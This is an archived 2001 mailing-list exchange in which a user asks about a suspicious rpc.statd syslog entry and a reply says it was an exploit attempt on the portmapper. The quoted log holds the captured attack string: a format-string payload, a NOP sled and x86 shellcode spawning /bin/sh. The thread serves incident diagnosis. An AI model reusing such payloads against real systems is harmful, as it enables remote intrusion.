Re:

Sun, 16 Sep 2001 16:45:39 -0700 

It looks like someone tried to exploit your portmapper.
If you want to be sure that nobody gets into your network, turn it off.

--On Samstag, 15. September 2001 12:51 -0400 Russell Speed
<[EMAIL PROTECTED]> wrote:

> I am curious if the following is an example of a buffer overflow.  I
> noticed this in my syslog - and the following day had someone logged in
> from an IP I'm not aware of.
>
> I changed the passwords - and added an entry to the input chain to block
> the IP, but am wondering what other things I should do?
>
> Should I remove /bin/sh for something less obvious as a general
> protection from buffer overflows?
>
> As you can see it's a lot of binary and then near the end is "/bin/sh".
>
> Sep  9 21:27:43 gw /sbin/rpc.statd[336]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
> 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
> 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
> 220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220 Sep  9 21:27:43 gw
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^A
> Í\200è\177ÿÿÿ
>
> Thanks,
>
> Russell
>
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
>





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to